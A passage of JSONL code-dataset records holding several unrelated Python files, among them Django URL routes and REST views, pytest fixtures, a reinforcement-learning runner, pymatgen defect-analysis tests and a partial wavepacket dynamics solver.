name='index'),\r\n\t\r\n\tpath(\r\n\t\t'funcionarios/',\r\n\t\tFuncionarioListView.as_view(),\r\n\t\tname='lista_funcionarios'),\r\n\r\n\tpath(\r\n\t\t'setores/',\r\n\t\tSetorListView.as_view(),\r\n\t\tname='lista_setores'),\r\n\r\n\tpath(\r\n\t\t'funcionario/',\r\n\t\tFuncionarioUpdateView.as_view(),\r\n\t\tname='atualiza_funcionario'),\r\n\r\n\tpath(\r\n\t\t'setor/',\r\n\t\tSetorUpdateView.as_view(),\r\n\t\tname='atualiza_setor'),\r\n\r\n\tpath(\r\n\t\t'funcionario/excluiF/',\r\n\t\tFuncionarioDeleteView.as_view(),\r\n\t\tname='deleta_funcionario'),\r\n\r\n\tpath(\r\n\t\t'setor/excluir/',\r\n\t\tSetorDeleteView.as_view(),\r\n\t\tname='deleta_setor'),\r\n\r\n\tpath(\r\n\t\t'funcionario/cadastrar/',\r\n\t\tFuncionarioCreateView.as_view(),\r\n\t\tname='cadastra_funcionario'),\r\n\r\n\tpath(\r\n\t\t'setor/cadastrar/',\r\n\t\tSetorCreateView.as_view(),\r\n\t\tname='cadastra_setor'),\r\n\r\n\r\n\r\n\r\n]","sub_path":"helloworld/website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"482266746","text":"from sybil import Sybil\nfrom sybil.parsers.codeblock import CodeBlockParser\nfrom pandas.testing import assert_series_equal\nimport pytest\nimport pandas as pd\n\n\n@pytest.fixture(scope=\"session\")\ndef assert_rows_equal():\n def _assert_rows_equal(r1, r2):\n d1 = r1.asDict(recursive=True)\n s1 = pd.Series(d1, index = sorted(d1.keys()))\n d2 = r2.asDict(recursive=True)\n s2 = pd.Series(d2, index = sorted(d2.keys()))\n # Permissive to floating-point error\n assert_series_equal(s1, s2)\n return _assert_rows_equal\n\npytest_collect_file = Sybil(\n parsers=[\n CodeBlockParser(future_imports=['print_function']),\n ],\n pattern='*.rst',\n fixtures=['assert_rows_equal', 'spark'],\n).pytest()\n","sub_path":"docs/source/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"494757914","text":"from environment import Environment\nfrom agent import *\n\n# Config Parameters\nepisode = 10**10\nframes = 10**1000\nheight = 7\nwidth = 7\nframe_rate = 0.01\nagent = 'NN' # random / NN\nlayers = 3\nepsilon = 0.5\ngamma = 1\nlearning_rate = 0.05\nmini_batch_size = 100\nexperience_pool_size = 500\neval_net_threshold = 50\ntarget_net_threshold = 10\nmodel_saving_threshold = 200\nobserve_rl_threshold = 100\nenter_test_mode_threshold = 100\nrevert_to_train_threshold = 20\nis_enable_ddqn = False\n\n\nif __name__ == \"__main__\":\n # Set the environment\n env = Environment(height=height, width=width, frame_rate=frame_rate)\n\n # Determine which agent to use\n if agent == 'random':\n agent = RandomAgent(experience_pool_size=experience_pool_size, shape=(height, width, layers))\n\n elif agent == 'NN':\n agent = NNAgent(shape=(height, width, layers)\n , epsilon=epsilon\n , gamma=gamma\n , learning_rate=learning_rate\n , mini_batch_size=mini_batch_size\n , experience_pool_size=experience_pool_size\n , eval_net_threshold=eval_net_threshold\n , target_net_threshold=target_net_threshold\n , is_enable_ddqn=is_enable_ddqn\n , model_saving_threshold=model_saving_threshold\n )\n\n else:\n print('No such agent!!!')\n exit()\n\n\n # set train_counter and test_counter\n train_counter = 0\n test_counter = 0\n\n # Start training\n for game in range(episode):\n print('episode:', game+1)\n state = env.reset()\n\n if not agent.is_test_mode:\n train_counter += 1\n else:\n test_counter += 1\n\n if train_counter == enter_test_mode_threshold:\n agent.is_test_mode = True\n train_counter = 0\n\n if test_counter == revert_to_train_threshold:\n agent.is_test_mode = False\n test_counter = 0\n\n for frame in range(frames):\n # determine state, action and reward\n action = agent.get_action(state)\n next_state, reward, done, info = env.step(action)\n agent.collect_experience(state, action, reward, next_state, done)\n state = next_state\n\n # execute specific method for the agent\n agent.agent_specific_method(game)\n\n if info is not None:\n print(info)\n print('is test mode:', agent.is_test_mode)\n print('# of times eval_net was updated:', agent.eval_net_update_count)\n print('# of times target_net was updated:', agent.target_net_update_count)\n\n if done:\n break\n\n","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"100462587","text":"import os\nfrom setuptools import setup, find_packages\nAPP = 'pgin'\nhere = os.path.abspath(os.path.dirname(__file__))\n# ==========================\n\n\ndef read_version():\n with open(os.path.join(here, APP, 'VERSION')) as vfr:\n version = vfr.read().strip()\n return version\n# ______________________________\n\n\nsetup(\n name=APP,\n version=read_version(),\n author=\"Victor Ziv\",\n author_email=\"vziv@infinidat.com\",\n url='https://git.infinidat.com/ivt/%s.git' % APP,\n packages=find_packages(),\n license='Proprietary',\n description='Very dedicated PostgreSQL DB migration utility. Using Python 3.6+ and psycopg2',\n long_description=open('README.rst').read(),\n long_description_content_type=\"text/x-rst\",\n install_requires=[\n 'jinja2',\n 'psycopg2',\n 'click',\n 'jsonlines',\n 'colorama',\n 'tabulate',\n 'toml',\n 'flake8'\n ],\n include_package_data=True,\n python_requires='>=3.6',\n\n entry_points='''\n [console_scripts]\n pgin=pgin.scripts.pgin:cli\n ''',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"434621686","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import EducationSerializer, ExperienceSerializer,ProjectSerializer,ProfileSerializer, SkillSerializer,CourseSerializer\n\nfrom .models import Education,Project, Experience, Skill, Course,Profile\n# Create your views here.\n\n@api_view(['GET'])\ndef apiOverview(request):\n\tapi_urls = {\n\t\t'List':'/education-list/',\n\t\t'Detail View':'/education-detail//',\n\t\t'Create':'/education-create/',\n\t\t'Update':'/education-update//',\n\t\t'Delete':'/education-delete//',\n\t\t}\n\n\treturn Response(api_urls)\n\n\t#\t\t**********\t\tEducation\t\t**********\n\n\n@api_view(['GET'])\ndef educationList(request):\n\teducations = Education.objects.all().order_by('-id')\n\tserializer = EducationSerializer(educations, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef educationCreate(request):\n\tserializer = EducationSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef educationUpdate(request, pk):\n\teducation = Education.objects.get(id=pk)\n\tserializer = EducationSerializer(instance=education, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n\n\t#\t\t**********\t\tprofile\t\t**********\n\n\n@api_view(['POST'])\ndef profileCreate(request):\n\tserializer = ProfileSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\n\treturn Response(serializer.data)\n\n@api_view(['GET'])\ndef profileDetail(request):\n\tprofile = Profile.objects.first()\n\tserializer = ProfileSerializer(profile, many=False)\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef profileUpdate(request, pk):\n\tprofile = Profile.objects.get(id=pk)\n\tserializer = ProfileSerializer(instance=profile, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n\t#\t\t**********\t\tExperience\t\t**********\n\n\n@api_view(['GET'])\ndef experienceList(request):\n\teducations = Experience.objects.all().order_by('-id')\n\tserializer = ExperienceSerializer(educations, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef experienceCreate(request):\n\tserializer =ExperienceSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef experienceUpdate(request, pk):\n\texperience = Experience.objects.get(id=pk)\n\tserializer = ExperienceSerializer(instance=experience, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n\t#\t\t**********\t\tSkill\t\t**********\n\n\n@api_view(['GET'])\ndef skillList(request):\n\tskills = Skill.objects.all().order_by('-id')\n\tserializer = SkillSerializer(skills, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef skillCreate(request):\n\tserializer = SkillSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef skillUpdate(request, pk):\n\tskill = Skill.objects.get(id=pk)\n\tserializer = SkillSerializer(instance=skill, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n\n\t#\t\t**********\t\tProject\t\t**********\n\n\n\n@api_view(['GET'])\ndef projectList(request):\n\tprojects = Project.objects.all().order_by('-id')\n\tserializer = ProjectSerializer(projects, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef projectCreate(request):\n\tserializer = ProjectSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef projectUpdate(request, pk):\n\tproject = Project.objects.get(id=pk)\n\tserializer = ProjectSerializer(instance=project, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n#\n\n\n@api_view(['GET'])\ndef courseList(request):\n\tcourses = Course.objects.all().order_by('-id')\n\tserializer = CourseSerializer(courses, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef courseCreate(request):\n\tserializer = CourseSerializer(data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n\n@api_view(['POST'])\ndef courseUpdate(request, pk):\n\tcourse = Course.objects.get(id=pk)\n\tserializer = CourseSerializer(instance=course, data=request.data)\n\tif serializer.is_valid():\n\t\tserializer.save()\n\treturn Response(serializer.data)\n","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"446369941","text":"import random\n\nif __name__ == '__main__':\n list1 = [random.randint(-15, 14) for _ in range(20)]\n max_num = max(list1)\n counter = 0\n for i in list1:\n if abs(i) > max_num:\n counter += 1\n print(list1)\n print(max_num)\n print(counter)\n","sub_path":"tasks/beginer/16_abs.py","file_name":"16_abs.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"446290856","text":"n,m =map(int,input().split())\r\n\r\na = [int(x)//2 for x in input().split()]\r\n\r\nimport fractions\r\n\r\ndef lcm(x, y):\r\n return (x * y) // fractions.gcd(x, y)\r\n\r\nimport math\r\n\r\nlcm1 = 1\r\nfor i in a:\r\n lcm1 = lcm(lcm1, i)\r\n if((lcm1//i)%2==0):\r\n print(0)\r\n exit()\r\n\r\nprint(math.ceil((m//lcm1)/2))\t\t\t\r\n","sub_path":"abc150/abc150_d/20200111131454.py","file_name":"20200111131454.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"498628631","text":"# coding: utf-8\n# Copyright (c) Pymatgen Development Team.\n# Distributed under the terms of the MIT License.\n\n\nimport unittest\nimport os\nimport numpy as np\nimport random\n\nfrom pymatgen.analysis.defects.utils import QModel, eV_to_k, \\\n generate_reciprocal_vectors_squared, \\\n closestsites, StructureMotifInterstitial, TopographyAnalyzer, \\\n ChargeDensityAnalyzer, converge, calculate_vol\nfrom pymatgen.util.testing import PymatgenTest\n\nfrom pymatgen.core import PeriodicSite\nfrom pymatgen.core.structure import Structure\nfrom pymatgen.core.lattice import Lattice\n\nfrom pymatgen.io.vasp.outputs import Chgcar\n\ntry:\n from skimage.feature import peak_local_max\nexcept ImportError:\n peak_local_max = None\n\ntest_dir = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"..\", \"..\",\n 'test_files', \"chgden\")\n\n\nclass DefectsUtilsTest(PymatgenTest):\n def test_qmodel(self):\n qm = QModel()\n modqm = QModel(beta=2., expnorm=0.5, gamma=0.1)\n\n # test rho_rec\n self.assertEqual(qm.rho_rec(1.), 0.77880078307140488)\n self.assertEqual(modqm.rho_rec(1.), 0.6814583156907158)\n\n # test rho_rec_limit0\n self.assertEqual(qm.rho_rec_limit0, -0.25)\n self.assertEqual(modqm.rho_rec_limit0, -0.51)\n\n def test_eV_to_k(self):\n self.assertAlmostEqual(eV_to_k(1.), 0.9681404248678961)\n\n def test_genrecip(self):\n # TODO\n pass\n\n def test_generate_reciprocal_vectors_squared(self):\n # test cubic case\n a = 6.\n lattvectors = [[a if i == j else 0. for j in range(3)] for i in\n range(3)]\n brecip = [1.0966227112321507 for i in range(6)]\n self.assertAlmostEqual(\n list(generate_reciprocal_vectors_squared(lattvectors[0],\n lattvectors[1],\n lattvectors[2], 1.3)),\n brecip)\n\n # test orthorhombic case\n lattconsts = [a, a / 2., 3. * a]\n lattvectors = [[lattconsts[i] if i == j else 0. for j in range(3)] for i\n in range(3)]\n brval = 0.4873878716587337\n brecip = [brval, brval / 4., brval / 4., brval]\n self.assertAlmostEqual(\n list(generate_reciprocal_vectors_squared(lattvectors[0],\n lattvectors[1],\n lattvectors[2], 1.)),\n brecip)\n\n # test triclinic case\n lattvectors = [[1.5, 0.2, 0.3], [0.3, 1.2, .2], [0.5, 0.4, 1.3]]\n brval = 24.28330561545568\n brecip = [brval, brval]\n self.assertAlmostEqual(\n list(generate_reciprocal_vectors_squared(lattvectors[0],\n lattvectors[1],\n lattvectors[2], 30.)),\n brecip)\n\n def test_closest_sites(self):\n struct = PymatgenTest.get_structure(\"VO2\")\n\n # test O vacancy\n dstruct = struct.copy()\n dstruct.remove_sites([0])\n pos = struct.sites[0].coords\n bsite, dsite = closestsites(struct, dstruct, pos)\n self.assertEqual(bsite[2], 0) # test against index\n self.assertEqual(dsite[2], 4)\n\n # test V vacancy\n dstruct = struct.copy()\n dstruct.remove_sites([4])\n pos = struct.sites[4].coords\n bsite, dsite = closestsites(struct, dstruct, pos)\n self.assertEqual(bsite[2], 4) # test against index\n self.assertEqual(dsite[2], 1)\n\n def test_converges(self):\n self.assertAlmostEqual(converge(np.sqrt, 0.1, 0.1, 1.0),\n 0.6324555320336759)\n\n\nclass StructureMotifInterstitialTest(PymatgenTest):\n def setUp(self):\n self.silicon = Structure(\n Lattice.from_lengths_and_angles([5.47, 5.47, 5.47],\n [90.0, 90.0, 90.0]),\n [\"Si\", \"Si\", \"Si\", \"Si\", \"Si\", \"Si\", \"Si\", \"Si\"],\n [[0.000000, 0.000000, 0.500000], [0.750000, 0.750000, 0.750000],\n [0.000000, 0.500000, 1.000000],\n [0.750000, 0.250000, 0.250000], [0.500000, 0.000000, 1.000000],\n [0.250000, 0.750000, 0.250000],\n [0.500000, 0.500000, 0.500000], [0.250000, 0.250000, 0.750000]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=False,\n site_properties=None)\n self.smi = StructureMotifInterstitial(\n self.silicon,\n \"Si\",\n motif_types=[\"tetrahedral\", \"octahedral\"],\n op_threshs=[0.3, 0.5],\n dl=0.4,\n doverlap=1.0,\n facmaxdl=1.51)\n self.diamond = Structure(\n Lattice([[2.189, 0, 1.264], [0.73, 2.064, 1.264], [0, 0, 2.528]]),\n [\"C0+\", \"C0+\"],\n [[2.554, 1.806, 4.423], [0.365, 0.258, 0.632]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=True,\n site_properties=None)\n self.nacl = Structure(\n Lattice([[3.485, 0, 2.012], [1.162, 3.286, 2.012], [0, 0, 4.025]]),\n [\"Na1+\", \"Cl1-\"],\n [[0, 0, 0], [2.324, 1.643, 4.025]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=True,\n site_properties=None)\n self.cscl = Structure(\n Lattice([[4.209, 0, 0], [0, 4.209, 0], [0, 0, 4.209]]),\n [\"Cl1-\", \"Cs1+\"],\n [[2.105, 2.105, 2.105], [0, 0, 0]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=True,\n site_properties=None)\n self.square_pyramid = Structure(\n Lattice([[100, 0, 0], [0, 100, 0], [0, 0, 100]]),\n [\"C\", \"C\", \"C\", \"C\", \"C\", \"C\"],\n [[0, 0, 0], [1, 0, 0], [-1, 0, 0], [0, 1, 0], [0, -1, 0],\n [0, 0, 1]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=True,\n site_properties=None)\n self.trigonal_bipyramid = Structure(\n Lattice([[100, 0, 0], [0, 100, 0], [0, 0, 100]]),\n [\"P\", \"Cl\", \"Cl\", \"Cl\", \"Cl\", \"Cl\"],\n [[0, 0, 0], [0, 0, 2.14], [0, 2.02, 0], [1.74937, -1.01, 0],\n [-1.74937, -1.01, 0], [0, 0, -2.14]],\n validate_proximity=False,\n to_unit_cell=False,\n coords_are_cartesian=True,\n site_properties=None)\n\n def test_all(self):\n self.assertIsInstance(self.smi, StructureMotifInterstitial)\n self.assertEqual(len(self.smi.enumerate_defectsites()), 1)\n self.assertIsInstance(self.smi.enumerate_defectsites()[0], PeriodicSite)\n self.assertEqual(\"Si\",\n self.smi.enumerate_defectsites()[0].species_string)\n self.assertEqual(\"tetrahedral\", self.smi.get_motif_type(0))\n\n elem_cn_dict = self.smi.get_coordinating_elements_cns(0)\n self.assertEqual(len(list(elem_cn_dict.keys())), 1)\n self.assertEqual(list(elem_cn_dict.keys())[0], \"Si\")\n self.assertEqual(elem_cn_dict[\"Si\"], 4)\n\n structs = self.smi.make_supercells_with_defects(np.array([1, 1, 1]))\n self.assertEqual(len(structs), 2)\n self.assertIsInstance(structs[0], Structure)\n\n def tearDown(self):\n del self.smi\n del self.silicon\n del self.diamond\n del self.nacl\n del self.cscl\n\n\nclass TopographyAnalyzerTest(unittest.TestCase):\n def setUp(self):\n feo4 = Structure.from_file(os.path.join(test_dir, \"LiFePO4.cif\"))\n feo4.remove_species([\"Li\"])\n feo4.remove_oxidation_states()\n self.feo4 = feo4\n\n def test_topography_analyzer(self):\n # check interstitial sites for FePO4 using Voronoi Tessellation\n vor_feo4 = TopographyAnalyzer(self.feo4, framework_ions=[\"O\"],\n cations=[\"P\", \"Fe\"], check_volume=False)\n vor_feo4.cluster_nodes(tol=1.2)\n vor_feo4.remove_collisions(1.2)\n s_feo4 = vor_feo4.get_structure_with_nodes()\n sites_feo4 = np.array(\n [s_feo4[i].frac_coords for i in range(len(s_feo4)) if\n s_feo4[i].species_string == \"X0+\"])\n\n # check total number of vnodes\n self.assertAlmostEqual(len(vor_feo4.vnodes), 24)\n\n # check four sites that match Li sites in LiFePO4(mp-19017)\n site_predicted = [[0, 0, 0], [0.5, 0.5, 0.5], [0.5, 0, 0.5],\n [0, 0.5, 0]]\n for i in range(0, 4):\n is_site_matched = False\n for site in sites_feo4:\n distance = s_feo4.lattice. \\\n get_distance_and_image(site, site_predicted[i])\n if distance[0] < 0.01:\n is_site_matched = True\n else:\n continue\n self.assertTrue(is_site_matched)\n\n def test_calculate_vol(self):\n s = Structure.from_file(os.path.join(test_dir, \"LiFePO4.cif\"))\n a = TopographyAnalyzer(s, framework_ions=[\"O\"],\n cations=[\"P\", \"Fe\"], check_volume=False)\n coords = [s[i].coords for i in [20, 23, 25, 17, 24, 19]]\n vol = calculate_vol(coords=coords)\n vol_expected = 12.8884 # LiO6 volume calculated by VESTA\n self.assertAlmostEqual(vol, vol_expected, 4)\n\n\n@unittest.skipIf(not peak_local_max,\n \"skimage.feature.peak_local_max module not present.\")\nclass ChgDenAnalyzerTest(unittest.TestCase):\n def setUp(self):\n # This is a CHGCAR_sum file with reduced grid size\n chgcar_path = os.path.join(test_dir, \"CHGCAR.FePO4\")\n chg_FePO4 = Chgcar.from_file(chgcar_path)\n self.chgcar_path = chgcar_path\n self.chg_FePO4 = chg_FePO4\n self.ca_FePO4 = ChargeDensityAnalyzer(chg_FePO4)\n self.s_LiFePO4 = Structure.from_file(\n os.path.join(test_dir, \"LiFePO4.cif\"))\n\n def test_get_local_extrema(self):\n ca = ChargeDensityAnalyzer.from_file(self.chgcar_path)\n threshold_frac = random.random()\n threshold_abs_min = random.randrange(2, 14)\n threshold_abs_max = random.randrange(27e2, 28e4)\n\n # Minima test\n full_list_min = self.ca_FePO4.get_local_extrema(find_min=True,\n threshold_frac=1.0)\n frac_list_min_frac = self.ca_FePO4.get_local_extrema(find_min=True,\n threshold_frac=threshold_frac)\n frac_list_min_abs = self.ca_FePO4.get_local_extrema(find_min=True,\n threshold_abs=threshold_abs_min)\n\n self.assertAlmostEqual(len(full_list_min) * threshold_frac,\n len(frac_list_min_frac), delta=1)\n\n ca.get_local_extrema(find_min=True)\n df_expected = ca.extrema_df[\n ca.extrema_df[\"Charge Density\"] <= threshold_abs_min]\n self.assertEqual(len(frac_list_min_abs), len(df_expected))\n\n # Maxima test\n full_list_max = self.ca_FePO4.get_local_extrema(find_min=False,\n threshold_frac=1.0)\n frac_list_max = self.ca_FePO4.get_local_extrema(find_min=False,\n threshold_frac=threshold_frac)\n frac_list_max_abs = self.ca_FePO4.get_local_extrema(find_min=False,\n threshold_abs=threshold_abs_max)\n\n self.assertAlmostEqual(len(full_list_max) * threshold_frac,\n len(frac_list_max), delta=1)\n\n # Local maxima should finds all center of atoms\n self.assertEqual(len(self.ca_FePO4.structure), len(full_list_max))\n\n ca.get_local_extrema(find_min=False)\n df_expected = ca.extrema_df[\n ca.extrema_df[\"Charge Density\"] >= threshold_abs_max]\n self.assertEqual(len(frac_list_max_abs), len(df_expected))\n\n def test_remove_collisions(self):\n ca = ChargeDensityAnalyzer(self.chg_FePO4)\n ca.get_local_extrema(threshold_frac=0)\n ca.remove_collisions() # should not trigger error\n self.assertEqual(len(ca.extrema_df), 0)\n\n self.ca_FePO4.get_local_extrema(find_min=False, threshold_frac=1.0)\n self.ca_FePO4.remove_collisions(min_dist=0.5)\n self.assertEqual(len(self.ca_FePO4.extrema_df), 0)\n\n def test_cluster_nodes(self):\n ca = ChargeDensityAnalyzer(self.chg_FePO4)\n ca.get_local_extrema()\n ca.cluster_nodes(tol=20)\n self.assertEqual(len(ca.extrema_df), 1)\n\n def test_get_structure_with_nodes(self):\n s_FePO4 = self.ca_FePO4.get_structure_with_nodes(find_min=True)\n\n sites_predicted = np.array([\n self.s_LiFePO4[i].frac_coords\n for i in range(len(self.s_LiFePO4))\n if self.s_LiFePO4[i].species_string == \"Li\"\n ])\n sites_guess = np.array(\n [s_FePO4[i].frac_coords for i in range(len(s_FePO4)) if\n s_FePO4[i].species_string == \"X0+\"])\n distances = s_FePO4.lattice.get_all_distances(sites_predicted,\n sites_guess).flatten()\n distances = [d for d in distances if d < 0.1]\n self.assertEqual(len(distances), len(sites_predicted))\n\n def test_from_file(self):\n ca = ChargeDensityAnalyzer.from_file(self.chgcar_path)\n self.assertTrue(isinstance(ca, ChargeDensityAnalyzer))\n\n def test_sort_sites_by_integrated_chg(self):\n print(self.chgcar_path)\n ca = ChargeDensityAnalyzer.from_file(self.chgcar_path)\n ca.get_local_extrema()\n ca.sort_sites_by_integrated_chg()\n print(ca._extrema_df.iloc[0], 0.5)\n print(ca._extrema_df.iloc[0]['avg_charge_den'])\n self.assertAlmostEqual(ca._extrema_df.iloc[0]['a'], 0.0)\n self.assertAlmostEqual(ca._extrema_df.iloc[0]['b'], 0.5)\n self.assertAlmostEqual(ca._extrema_df.iloc[0]['c'], 0.0)\n self.assertAlmostEqual(ca._extrema_df.iloc[0]['Charge Density'],\n 1.65288944124)\n self.assertAlmostEqual(ca._extrema_df.iloc[0]['avg_charge_den'],\n 0.006831484178753711)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pymatgen/analysis/defects/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":14418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"628476519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 4 23:44:15 2021\n\nWave packet dynamics solver for wavepacket dynamics with N vibrational modes\n(N = 1 ,2)\n\nFor linear coordinates, use SPO method\nFor curvilinear coordinates, use RK4 method\n\n@author: Bing Gu\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import cos, pi\nfrom numba import jit\nfrom scipy.fftpack import fft2, ifft2, fftfreq\nfrom numpy.linalg import inv, det\n\nfrom lime.phys import rk4\nfrom lime.units import au2fs\n\nclass Solver():\n def __init__(self):\n self.obs_ops = None\n self.grid = None\n\n def set_obs_ops(self, obs_ops):\n self.obs_ops = obs_ops\n return\n\nclass SPO_1d(Solver):\n def __init__(self):\n self.x = None\n self.v = None\n\n def set_grid(self, xmin=-1, xmax=1, npts=32):\n self.x = np.linspace(xmin, xmax, npts)\n\n def set_potential(self, potential):\n self.v = potential(self.x)\n return\n\n def evolve(self, psi0, dt, Nt=1):\n psi = psi0\n return psi\n\n\nclass SPO_2d():\n def __init__(self):\n self.x = None\n self.y = None\n\n def set_grid(self, x, y):\n self.x = x\n self.y = y\n\n def set_potential(self, v):\n return v\n\n def evolve(self, psi0, dt, Nt=1):\n psi = psi0\n return psi\n\nclass SPO_3d():\n def __init__(self):\n self.x = None\n self.y = None\n\n def set_grid(self, x, y):\n self.x = x\n self.y = y\n\n def set_potential(self, v):\n return v\n\n def evolve(self, psi0, dt, Nt=1):\n psi = psi0\n return psi\n\n\n@jit\ndef gauss_x_2d(sigma, x0, y0, kx0, ky0):\n \"\"\"\n generate the gaussian distribution in 2D grid\n :param x0: float, mean value of gaussian wavepacket along x\n :param y0: float, mean value of gaussian wavepacket along y\n :param sigma: float array, covariance matrix with 2X2 dimension\n :param kx0: float, initial momentum along x\n :param ky0: float, initial momentum along y\n :return: gauss_2d: float array, the gaussian distribution in 2D grid\n \"\"\"\n gauss_2d = np.zeros((len(x), len(y)), dtype=np.complex128)\n\n for i in range(len(x)):\n for j in range(len(y)):\n delta = np.dot(np.array([x[i]-x0, y[j]-y0]), inv(sigma))\\\n .dot(np.array([x[i]-x0, y[j]-y0]))\n gauss_2d[i, j] = (np.sqrt(det(sigma))\n * np.sqrt(np.pi) ** 2) ** (-0.5) \\\n * np.exp(-0.5 * delta + 1j\n * np.dot(np.array([x[i], y[j]]),\n np.array([kx0, ky0])))\n\n return gauss_2d\n\n\n@jit\ndef potential_2d(x_range_half, y_range_half, couple_strength, couple_type):\n \"\"\"\n generate two symmetric harmonic potentials wrt the origin point in 2D\n :param x_range_half: float, the displacement of potential from the origin\n in x\n :param y_range_half: float, the displacement of potential from the origin\n in y\n :param couple_strength: the coupling strength between these two potentials\n :param couple_type: int, the nonadiabatic coupling type. here, we used:\n 0) no coupling\n 1) constant coupling\n 2) linear coupling\n :return: v_2d: float list, a list containing for matrices:\n v_2d[0]: the first potential matrix\n v_2d[1]: the potential coupling matrix\n between the first and second\n v_2d[2]: the potential coupling matrix\n between the second and first\n v_2d[3]: the second potential matrix\n \"\"\"\n v_2d = [0, 0, 0, 0]\n v_2d[0] = (xv + x_range_half) ** 2 / 2.0 + (yv + y_range_half) ** 2 / 2.0\n v_2d[3] = (xv - x_range_half) ** 2 / 2.0 + (yv - y_range_half) ** 2 / 2.0\n\n # x_cross = sympy.Symbol('x_cross')\n # mu = sympy.solvers.solve(\n # (x_cross - x_range_half) ** 2 / 2.0 -\n # (x_cross + x_range_half) ** 2 / 2.0,\n # x_cross)\n\n if couple_type == 0:\n v_2d[1] = np.zeros(np.shape(v_2d[0]))\n v_2d[2] = np.zeros(np.shape(v_2d[0]))\n elif couple_type == 1:\n v_2d[1] = np.full((np.shape(v_2d[0])), couple_strength)\n v_2d[2] = np.full((np.shape(v_2d[0])), couple_strength)\n elif couple_type == 2:\n v_2d[1] = couple_strength * (xv+yv)\n v_2d[2] = couple_strength * (xv+yv)\n # elif couple_type == 3:\n # v_2d[1] = couple_strength \\\n # * np.exp(-(x - float(mu[0])) ** 2 / 2 / sigma ** 2)\n # v_2d[2] = couple_strength \\\n # * np.exp(-(x - float(mu[0])) ** 2 / 2 / sigma ** 2)\n else:\n raise 'error: coupling type not existing'\n\n return v_2d\n\n\n@jit\ndef diabatic(x, y):\n \"\"\"\n PESs in diabatic representation\n :param x_range_half: float, the displacement of potential from the origin\n in x\n :param y_range_half: float, the displacement of potential from the origin\n in y\n :param couple_strength: the coupling strength between these two potentials\n :param couple_type: int, the nonadiabatic coupling type. here, we used:\n 0) no coupling\n 1) constant coupling\n 2) linear coupling\n :return:\n v: float 2d array, matrix elements of the DPES and couplings\n \"\"\"\n nstates = 2\n\n v = np.zeros((nstates, nstates))\n\n v[0,0] = (x + 4.) ** 2 / 2.0 + (y + 3.) ** 2 / 2.0\n v[1,1] = (x - 4.) ** 2 / 2.0 + (y - 3.) ** 2 / 2.0\n\n v[0, 1] = v[1, 0] = 0\n\n return v\n\n# @jit\n# def x_evolve_half_2d(dt, v_2d, psi_grid):\n# \"\"\"\n# propagate the state in grid basis half time step forward with H = V\n# :param dt: float\n# time step\n# :param v_2d: float array\n# the two electronic states potential operator in grid basis\n# :param psi_grid: list\n# the two-electronic-states vibrational state in grid basis\n# :return: psi_grid(update): list\n# the two-electronic-states vibrational state in grid basis\n# after being half time step forward\n# \"\"\"\n\n# for i in range(len(x)):\n# for j in range(len(y)):\n# v_mat = np.array([[v_2d[0][i, j], v_2d[1][i, 